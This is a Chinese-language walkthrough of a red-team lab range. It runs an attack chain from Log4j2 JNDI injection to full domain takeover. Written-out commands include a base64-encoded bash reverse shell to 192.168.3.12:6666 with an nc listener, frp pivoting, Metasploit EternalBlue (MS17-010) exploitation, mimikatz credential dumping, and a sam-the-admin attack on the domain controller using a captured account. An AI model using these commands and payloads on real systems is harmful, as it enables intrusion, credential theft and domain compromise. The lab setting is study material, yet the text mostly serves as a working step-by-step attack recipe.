涉及知識點:
1.log4j2漏洞利用
2.frp代理流量
3.使用msf進行永恆之藍攻擊
4.msf中的代理模塊(記得添加路由route add 10.0.1.0 255.255.255.0 1)
5.msf的一些基礎命令:bg,shell,sessions,jobs等
一、應用入口
1.對靶機進行端口掃描
發現開通了38080和22端口
訪問3808
2.嘗試使用新出的log4j2漏洞(cve-2021-44228)
反彈dnslog成功,目標存在log4j2漏洞
注:這里之前試了好多次,回報顯示ok,但dnslog無回顯,重新解壓靶機就好了
3.發現目標存在log4j2漏洞后進行反彈shell
首先起一個LDAP服務,這里ip為vps地址,命令為反彈shell
工具地址:https://github.com/welk1n/JNDI-Injection-Exploit
4.准備payload
bash -i >& /dev/tcp/192.168.3.12/6666 0>&1
5.使用burpsuit進行base64編碼
6.運行ldap服務
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTIvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.3.12"
7.新起一個窗口監聽6666端口
nc -lvp 6666
8.使用6中的payload進行攻擊
9.反彈shell成功
10.獲取flag
發現在/root下有flag.txt,打開文件找到flag以及賬號密碼
由於之前掃到了38080和22端口,使用找到的賬號密碼登錄22端口,發現可以登錄成功
至此,第一階段已完成
二、內網滲透
1.通過獲取的賬號密碼登錄服務器
2.對內網進行ping掃描
for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done
發現內網主機10.0.1.7
注:這里要跑很久,可以重新開一個會話進行操作
3.通過frp將流量代理到kali 192.168.3.12
下載frp。Chmod +777 frp對frp授權
服務端配置:
運行服務端
客戶端(web服務器)配置
運行客戶端
4.將frp流量代理到msf
5.使用auxiliary/scanner/smb/smb_version對主機進行掃描
發現為windows7主機,且存在域REDTEAM
6.因為是windows7主機,嘗試使用永恆之藍進行攻擊
使用auxiliary/scanner/smb/smb_ms17_010模塊進行掃描
發現存在ms17-010漏洞
7.利用永恆之藍漏洞
使用xploit/windows/smb/ms17_010_eternalblue進行攻擊,設置目標主機和paylaod,payload使用bind_tcp
利用成功
8.獲取flag
9.導入mimikatz抓取用戶憑證
抓取到域用戶root/Res12345
10.ipconfig /all
發現域控為redteam.lab,DNS為10.0.0.12
ping域控
三。攻擊域控
1.CVE-2021-42287、CVE-2021-42278攻擊
因為抓取到了域用戶,使用新出的CVE-2021-42287、CVE-2021-42278進行嘗試
首先使用msf添加socks,使用auxiliary/server/socks_proxy 模塊
2.配置etc下的proxychains4.conf
Dynamic_chain取消注釋
Strict_chain添加注釋
在末尾添加
3.添加路由到10.0.0.12的路由
4.使用代理對域控進行攻擊
域控攻擊腳本:https://github.com/WazeHell/sam-the-admin
proxychains4 python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell
5.獲取flag
備注;
靶場:靶場使用紅隊攻防實驗室靶場
參考:https://mp.weixin.qq.com/s/c4pejvL6VtiTbvFnbRHUCw
https://mp.weixin.qq.com/s/UAeOtOwigsB45hcjYEGh9g